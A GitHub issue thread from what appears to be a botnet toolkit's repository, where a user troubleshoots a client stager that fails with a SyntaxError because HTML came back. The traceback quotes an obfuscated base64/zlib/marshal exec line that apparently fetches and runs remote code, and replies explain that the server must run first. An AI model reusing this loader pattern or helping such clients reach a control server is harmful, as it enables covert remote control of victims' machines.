### ISSUE TITLE
!DOCTYPE html PUBLIC - SyntaxError: invalid syntax

### ISSUE THREAD

**Issue by Nadjorf** [malwaredllc/byob#153]
Hello, I've this output error when trying to run the client script.

--------------------------------------------------xxxx
C:\Python27\byob\byob>python byob_cO4.py
Traceback (most recent call last):
  File "byob_cO4.py", line 5, in <module>
    exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrtmFgYCgtyskvSM3TUM8oKSmw0tc3NNAzNDbVMzHQMzI2sbIwsDDU19cvLklMTy0q1k/2N9ErqFTX1CtKTUzR0AQASKgSBQ==')))))
  File "<string>", line 1
    <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    ^
SyntaxError: invalid syntax
--------------------------------------------------xxxx
= The command that was below:
C:\Python27\byob\byob>python client.py 10.x.x.x 8080

C:\Python27\byob\byob>python -V
Python 2.7.14

**Comment by yamortsa** [comment]
you have to open server.py before running any client

**Comment by Nadjorf** [comment]
> 
> 
> you have to open server.py before running any client

I've one open..

**Comment by Nadjorf** [comment]
Theres a connection, but with other type of error.
